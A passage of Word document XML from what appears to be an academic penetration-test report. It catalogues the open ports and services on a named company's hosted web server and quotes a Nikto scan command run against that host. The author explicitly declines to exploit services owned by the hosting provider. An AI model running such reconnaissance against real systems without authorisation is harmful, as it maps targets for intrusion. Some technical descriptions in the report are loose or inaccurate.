      <w:r w:rsidR="00627A9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC4B98">
        <w:t xml:space="preserve">‘submission’ service is also being utilised for E-Mail error correction to reduce the rate of undelivered messages from the SMTP client to the SMTP server utilising port 587. </w:t>
      </w:r>
      <w:r w:rsidR="00B7735E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1017/CBO9781107415324.004","ISBN":"9780596552770","ISSN":"1098-6596","PMID":"25246403","abstract":"SUMMARY: The Simple Network Management Protocol (SNMP) is an Internet-standard protocol for managing hosts on an IP network. \"Essential SNMP is a practical introduction to SNMP for system administrators. It starts with the basics: what SNMP is and how it works, along with some technical background to help administrators use it effectively-such things as how SNMP works and what OIDs, MIBs, community strings, and traps are. But the main focus of the book is on practical network administration: how to configure SNMP agents and network management stations, how to use SNMP to retrieve and modify variables on network devices, how to configure management software to react to traps sent by managed devices. \"Essential SNMP discusses a range of commercial and open source packages, including HP's OpenView, Castle Rock's SNMPc, the Net-SNMP tools, Simon Leinen's Perl SNMP support, and MRTG. The book covers all SNMP versions through SNMPv3.","author":[{"dropping-particle":"","family":"Mauro","given":"Douglas R","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Schmidt","given":"Kevin J","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Xtemp01","id":"ITEM-1","issued":{"date-parts":[["2005"]]},"title":"Essential SNMP","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=89c6d420-82bf-4347-8be8-53acc0710314"]}],"mendeley":{"formattedCitation":"[112]","plainTextFormattedCitation":"[112]","previouslyFormattedCitation":"[112]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B7735E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B7735E" w:rsidRPr="00B7735E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[112]</w:t>
      </w:r>
      <w:r w:rsidR="00B7735E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03618CCD" w14:textId="630D67C3" w:rsidR="004A3826" w:rsidRDefault="004A3826" w:rsidP="00BB20F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Name System (DNS)</w:t>
      </w:r>
      <w:r w:rsidR="00B7735E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> port </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B30">
        <w:t>53 is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also being utilised in conjunction with </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3826">
        <w:t xml:space="preserve">Remote Name Daemon Control </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3826">
        <w:t>RNDC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) port </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3826">
        <w:t xml:space="preserve">953 </w:t>
      </w:r>
      <w:r>
        <w:t>which are common services for Linux webservers to translate IP addresses to human readable domain names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704CDB19" w14:textId="467C2E35" w:rsidR="00636308" w:rsidRDefault="00636308" w:rsidP="00BB20F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A MySQL backend </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B30">
        <w:t xml:space="preserve">relationship </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">database is also present </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B30">
        <w:t xml:space="preserve">on the server </w:t>
      </w:r>
      <w:r>
        <w:t>that is running on port 3306 along with a File Transport Protocol (FTP) file server</w:t>
      </w:r>
      <w:r w:rsidR="002521AB">
        <w:t xml:space="preserve"> service on port 21</w:t>
      </w:r>
      <w:r w:rsidR="00627A9D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D752C02" w14:textId="49310661" w:rsidR="00222203" w:rsidRDefault="00222203" w:rsidP="00BB20F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>SSH is enabled on the webserver that allows a secure remote connection to the server which could be vulnerable to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7065AFD1" w14:textId="6FC98FC6" w:rsidR="00F74183" w:rsidRDefault="00F74183" w:rsidP="00BB20F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There is also a Remedial Simple File Transport Protocol (RSFTP) running on port 26. After further investigation of the port, </w:t>
      </w:r>
      <w:r w:rsidR="00AA6118" w:rsidRPr="00AA6118">
        <w:t>the service</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6118">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00794AC9" w:rsidRPr="00AA6118">
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6118">
        <w:t xml:space="preserve"> a known vulnerable bug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within some applications that utilise this service </w:t>
      </w:r>
      <w:r w:rsidR="00AA6118">
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> remote User Datagram Protocol (UDP), that allows a telnet session without any authentication to access a file server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86EF47" w14:textId="71EB8E23" w:rsidR="00BC1B30" w:rsidRDefault="00BC1B30" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An IBM Storage Area </w:t>
      </w:r>
      <w:r w:rsidR="00A76435">
        <w:t>Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SAN)</w:t>
      </w:r>
      <w:r w:rsidR="00AA6118">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is also being utilised due to store data at the CSP because ports 2077 service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tsrmagt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and 2078 service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tpcsrvr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are being utilised which are proprietary IBM protocols </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">used within IBM </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1B30">
        <w:t>Total</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1B30">
        <w:t>Storage Productivity Centre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (TSPC) software that are configured remotely using the SSH protocol. These IBM SAN ports are not known vulnerable ports, although the information garnered helps to map and fingerprint the network in which the target website is being hosted within</w:t>
      </w:r>
      <w:r w:rsidR="00CC76BB">
        <w:t>, furthermore these services are owned by the CSP and therefore it would be illegal to exploit these services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1168C12C" w14:textId="25977F6E" w:rsidR="00CC76BB" w:rsidRDefault="00CC76BB" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC76BB">
        <w:t>idware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC76BB">
        <w:t>-router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service running on port </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC76BB">
        <w:t>2079</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a remote port utilised by a third party Network Operation Control (NOC) that manage the CSP underlying infrastructure. It would also be illegal to attempt to exploit these services as that would grant access to the CSP underlying infrastructure containing millions of websites that are hosted within.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40005AFB" w14:textId="331B4842" w:rsidR="00CC76BB" w:rsidRDefault="00E27B61" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E27B61">
        <w:t>autodesk-nlm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service running on port </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27B61">
        <w:t>2080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a Networking Licensing Manager (NLM) for engineering software Autodesk, which highlights the company utilises design software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AFD45C" w14:textId="1981DEA5" w:rsidR="00E27B61" w:rsidRDefault="00F55FA1" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F55FA1">
        <w:t>infowave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service running on port </w:t>
      </w:r>
      <w:r w:rsidRPr="00F55FA1">
        <w:t>2082</w:t>
      </w:r>
      <w:r>
        <w:t>, upon research is a legacy Mobile Device Management (MDM)</w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.gartner.com/it-glossary/mobile-device-management-mdm","abstract":"Mobile device management (MDM) includes software that provides the following functions: software distribution, policy management, inventory management, security management and service management for smartphones and media tablets. MDM functionality is similar to that of PC configuration life cycle management (PCCLM) tools; however, mobile-platform-specific requirements are often part of MDM suites.","accessed":{"date-parts":[["2017","12","11"]]},"author":[{"dropping-particle":"","family":"Gartner.com","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"gartner.com","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"page":"1","title":"Mobile Device Management (MDM) - Gartner IT Glossary","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=b7d64418-5c4c-3d66-8a1d-257519373cfd"]}],"mendeley":{"formattedCitation":"[113]","plainTextFormattedCitation":"[113]","previouslyFormattedCitation":"[113]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CC59B2" w:rsidRPr="00CC59B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[113]</w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server that is either being utilised by the client or the CSP. Because the researcher is unable to distinguish whom own</w:t>
      </w:r>
      <w:r w:rsidR="00961600">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the service, it will not be attempted to be exploited due to potential legal issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C24CD0" w14:textId="65BFCA40" w:rsidR="00F55FA1" w:rsidRDefault="00961600" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00961600">
        <w:t>radsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service utilising port </w:t>
      </w:r>
      <w:r w:rsidRPr="00961600">
        <w:t>2083</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is an open source Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="00961600">
        <w:t xml:space="preserve">Remote Authentication Dial-In User Service </w:t>
      </w:r>
      <w:r>
        <w:t>(RADIUS)</w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://documentation.meraki.com/MR/Encryption_and_Authentication/Configuring_RADIUS_Authentication_with_WPA2-Enterprise","abstract":"Cisco Meraki MR access points offer a number of authentication methods for wireless association, including the use of external authentication servers to support WPA2-Enterprise. This article outlines Dashboard configuration to use a RADIUS server for WPA2-Enterprise authentication, RADIUS server requirements, and an example server configuration using Windows NPS.","accessed":{"date-parts":[["2017","12","11"]]},"author":[{"dropping-particle":"","family":"meraki.com","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"meraki.com","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"page":"1","title":"RADIUS Authentication with WPA2-Enterprise - Cisco Meraki","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=411756e5-5472-351a-8336-1682e9eb1a9e"]}],"mendeley":{"formattedCitation":"[114]","plainTextFormattedCitation":"[114]","previouslyFormattedCitation":"[114]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CC59B2" w:rsidRPr="00CC59B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[114]</w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00961600">
        <w:t>Authentication, Authorization, and Accounting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (AAA)</w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BE64F8">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"http://searchsecurity.techtarget.com/definition/AAA-server","abstract":"DEFINITION\r\nAAA server (authentication, authorization, and accounting)\r\n\r\nPosted by: Margaret Rouse\r\nWhatIs.com\r\n   \r\n\r\nSponsored News\r\nOne More Reason to Use HCI: Bolstering Security\r\n–VMware\r\nSimpler IT: From Building Blocks to Converged Systems\r\n–Dell EMC\r\nSee More\r\n\r\nVendor Resources\r\nCreate A Simpler, Secure, more Agile Network\r\n–Nokia\r\nAn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accessed":{"date-parts":[["2017","12","11"]]},"author":[{"dropping-particle":"","family":"security.techtarget","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"techtarget.com","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"page":"1","title":"What is AAA server (authentication, authorization, and accounting)? - Definition from WhatIs.com","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=157b0dbc-e2c1-3e53-be2d-a4121c8bfba3"]}],"mendeley":{"formattedCitation":"[115]","plainTextFormattedCitation":"[115]","previouslyFormattedCitation":"[115]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CC59B2" w:rsidRPr="00CC59B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[115]</w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security server that is potentially being utilised to authenticate users to the target website </w:t>
      </w:r>
      <w:r w:rsidR="005410A6">
        <w:t xml:space="preserve">to the administrator control panel </w:t>
      </w:r>
      <w:r>
        <w:t>or authenticate CSP engineers, because the researcher is unable to distinguish whom owns the service, it will not be attempted to be exploited due to potential legal issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716F18D" w14:textId="2A153990" w:rsidR="00961600" w:rsidRDefault="00704352" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00704352">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00704352">
        <w:t>gnunet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service running on port </w:t>
      </w:r>
      <w:r w:rsidRPr="00704352">
        <w:t xml:space="preserve">2086 </w:t>
      </w:r>
      <w:r>
        <w:t>is a datacentre protocol utilised for mesh discovery within the decentralised hosting network. Therefore, it is owned and linked to the underlying CSP infrastructure so no exploitation on this port will be attempted due to legal issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4E228E" w14:textId="45C53336" w:rsidR="00704352" w:rsidRDefault="00704352" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Event Logging Integration (ELI) service running on port 2087 is CSP logging security server protocol owned by the CSP to log all interactions with the CSP datacentre. Therefore, this service will not be exploited due to legal reasons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A85F2" w14:textId="1A900FFD" w:rsidR="00704352" w:rsidRDefault="00704352" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00704352">
        <w:t>nbx-ser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> running on port </w:t>
      </w:r>
      <w:r w:rsidRPr="00704352">
        <w:t>2095</w:t>
      </w:r>
      <w:r w:rsidR="005410A6">
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005410A6" w:rsidRPr="005410A6">
        <w:t>nbx-dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005410A6">
        <w:t xml:space="preserve"> service running on port 2096</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is utilised as a control panel API for administrators to utilise to manage services being provided to their clients. This port is potentially vulnerable and could result in a XSS attack being leveraged against the backend database if there are issues within the PHP code linking the front end of the website to the backend database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F503BE" w14:textId="7A23A8B8" w:rsidR="00BC1B30" w:rsidRDefault="0077655B" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Ethernet Industrial Protocol (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0077655B">
        <w:t>EtherNetIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) running on port </w:t>
      </w:r>
      <w:r w:rsidRPr="0077655B">
        <w:t>2222</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is an industrial application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protocl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> programmable automation controller utilised within large datacentres. The researcher can assume that this service is owned by the CSP and connects to the underlying datacentre infrastructure, so no attempt at exploitation will take place due to legal reasons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C999F" w14:textId="274E0707" w:rsidR="00D228CD" w:rsidRDefault="00D228CD" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The unknown service running on port 37834 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>can not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be identified due to running on an unassigned port range, due to the target website being hosted within a CSP. This port will not be explored further due to potential legal issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77705654" w14:textId="361881D1" w:rsidR="00D228CD" w:rsidRDefault="00D228CD" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After the thorough research garnered from the </w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap data. A more targeted approach was then adopted using a </w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanner </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to try and identify any coding issues within the website and/or </w:t>
      </w:r>
      <w:r w:rsidR="00CC59B2">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the services found within Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE4B2F" w14:textId="1A01DDA2" w:rsidR="00D228CD" w:rsidRDefault="00D228CD" w:rsidP="00BC1B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The results from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> website vulnerability assessment using the syntax [ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:r w:rsidRPr="00D228CD">
        <w:t>www.tevelcyber.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] was very fruitful with the</w:t>
      </w:r>
      <w:r w:rsidR="00876359">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A71BAB">
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it provided </w:t>
      </w:r>
      <w:r w:rsidR="00A71BAB">
        <w:t>whilst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fingerprinting the HTTPS webserver shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00A71BAB" w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE0532" w14:textId="77777777" w:rsidR="00A71BAB" w:rsidRDefault="00586631" w:rsidP="00A71BAB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BCF3517" wp14:editId="590B7695">
            <wp:extent cx="5730240" cy="17830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51046"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="1783080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CF589C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74E2B930" wp14:editId="6DAA8B40">
            <wp:extent cx="5730240" cy="2799080"/>
            <wp:effectExtent l="0" t="0" r="381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25663"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="2799080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FA130" w14:textId="4640FAF5" w:rsidR="00BB20F4" w:rsidRDefault="00A71BAB" w:rsidP="00A71BAB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc40134069"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00E77759">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Website Vulnerability Analyses of Target Website </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="4418706E" w14:textId="77777777" w:rsidR="00876359" w:rsidRDefault="00876359" w:rsidP="00BB20F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The results from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan reveal that the webserver is running an Apache OS located within the Salford, Manchester, England, UK and the WordPress application has been utilsed to build the website. </w:t>
      </w:r>
    </w:p>
